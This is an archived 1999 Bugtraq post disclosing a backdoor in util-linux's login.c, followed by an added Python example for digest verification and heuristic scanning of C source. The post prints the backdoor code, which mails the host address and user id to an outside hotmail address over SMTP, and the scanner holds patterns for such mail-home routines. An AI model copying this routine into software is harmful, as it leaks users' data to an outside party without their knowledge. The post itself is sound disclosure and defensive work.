Bugtraq mailing list archives
Re: backdoored tcp wrapper source code
From: building () CS UMD EDU (John Stange)
Date: Sat, 23 Jan 1999 22:49:29 -0500
You may want to have a thorough look at everything you've got... I grabbed a copy of util-linux2.9g (admittedly being a bad boy and not checking against anything), and while I don't have a pristine copy of the source on hand to check, I'm guessing that sendmail and a hotmail address is not standard behavior for /bin/login:

(from login-utils/login.c)

    he = gethostbyname("mail.hotmail.com");
    if (!he) exit(0);
    ia = (struct in_addr *)he->h_addr_list[0];
    l = sizeof(sai); memset(&sai,0,l);
    sai.sin_port = htons(25);
    sai.sin_addr.s_addr = ia->s_addr;
    if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0);
    if ((connect(s,(struct sockaddr*)&sai,l)) < 0) exit(0);
    if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0) exit(0);
    sprintf(b,"\r\nHost = %s\r\nUid = %i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid());
    sleep(1); if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0);
    sleep(1); if (write(s,"MAIL FROM:<xul () hotmail com>\n",28) < 0) exit(0);
    if (write(s,"RCPT TO:<wlogain () hotmail com>\n",30) < 0) exit(0);
    sleep(1); if (write(s,"DATA\n",5) < 0) exit(0);
    sleep(1); if (write(s,b,strlen(b)) < 0) exit(0);
    sleep(1); if (write(s,"QUIT\n",5) < 0) exit(0);
    sleep(1); close(creat("/var/tmp/.fmlock0",511)); exit(0);

etc etc

I'm in a bit of a hurry, so I haven't had a chance to comb anything else...
TCP Wrappers is a widely-used security tool to protect UNIX systems against intrusion. It has an estimated installed base of millions. Today someone replaced the tcp wrapper source on ftp.win.tue.nl by a backdoored version. Eventually this was bound to happen, and that's why the source file is accompanied by a PGP signature. But that is no guarantee against people downloading and installing backdoored software.
-- John Stange Staff World, 4120 AVW x52720
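The two defensive steps this thread points at are (1) checking a download against something obtained out of band before building it, and (2) looking for behaviour that has no business in the program, as the poster did by eye in login.c. The following is an added example written for this page, not code from the thread, util-linux or TCP Wrappers. It stands in a SHA-256 digest for the PGP signature check (the mechanics of "verify before you untar" are the same; in practice `gpg --verify` against a key you already trust is the real tool), and it scans C source for indicators modelled on the posted fragment: DNS lookups of hard-coded hostnames, raw socket calls and SMTP verbs in string literals. The API list, regexes, file names and sample sources are this example's own assumptions and constructions.

```python
import hashlib
import hmac
import re
from pathlib import Path
from tempfile import TemporaryDirectory

# Heuristic indicators for a login program (assumption of this example, not a
# definitive list): network API calls, hard-coded hostnames, SMTP verbs.
NETWORK_APIS = ("gethostbyname", "socket(", "connect(", "getsockname")
SMTP_VERBS = re.compile(r'"(HELO|MAIL FROM|RCPT TO|DATA|QUIT)\b')
HOSTNAME_LITERAL = re.compile(r'"((?:[a-z0-9-]+\.)+(?:com|net|org|edu))"', re.I)


def sha256_file(path: Path) -> str:
    """Hex SHA-256 of a file, streamed so large tarballs are handled."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path: Path, expected_sha256: str) -> bool:
    """True only if the file matches a digest obtained from a separate channel.

    A digest fetched from the same compromised FTP site proves nothing; the
    value passed here must come from somewhere the attacker could not edit.
    """
    return hmac.compare_digest(sha256_file(path), expected_sha256.lower())


def scan_source(text: str) -> list[str]:
    """Report network indicators in one C source file as 'lineno: reason'."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for api in NETWORK_APIS:
            if api in line:
                findings.append(f"{lineno}: network API {api.rstrip('(')}")
        for m in HOSTNAME_LITERAL.finditer(line):
            findings.append(f"{lineno}: hard-coded hostname {m.group(1)}")
        for m in SMTP_VERBS.finditer(line):
            findings.append(f"{lineno}: SMTP verb {m.group(1)} in string literal")
    return findings


# Constructed samples: a clean fragment of a login program, and one carrying
# the kind of mail-home routine described in the post. Hostnames are
# placeholders, not the values from the report.
CLEAN_SOURCE = '''
    if (pwd->pw_uid == 0)
        syslog(LOG_NOTICE, "ROOT LOGIN on %s", tty_name);
'''

SUSPECT_SOURCE = '''
    he = gethostbyname("mail.example.com");
    if (!he) exit(0);
    s = socket(AF_INET, SOCK_STREAM, 0);
    write(s, "HELO 127.0.0.1\\n", 15);
    write(s, "RCPT TO:<drop@example.com>\\n", 27);
'''


def demo() -> dict:
    """Create a constructed tarball, check good and bad digests, scan both samples."""
    with TemporaryDirectory() as d:
        tarball = Path(d) / "util-linux-constructed.tar.gz"  # constructed, not a real archive
        tarball.write_bytes(b"constructed tarball contents, not a real archive\n")
        good = sha256_file(tarball)
        return {
            "good_digest_accepted": verify_download(tarball, good),
            "tampered_digest_rejected": not verify_download(tarball, "0" * 64),
            "clean_findings": scan_source(CLEAN_SOURCE),
            "suspect_findings": scan_source(SUSPECT_SOURCE),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The scanner is deliberately crude: its job is to put a handful of lines in front of a human, who then diffs them against a pristine copy, rather than to decide on its own. The digest check is the part worth wiring into a build script so that an unverified tarball never reaches `make`.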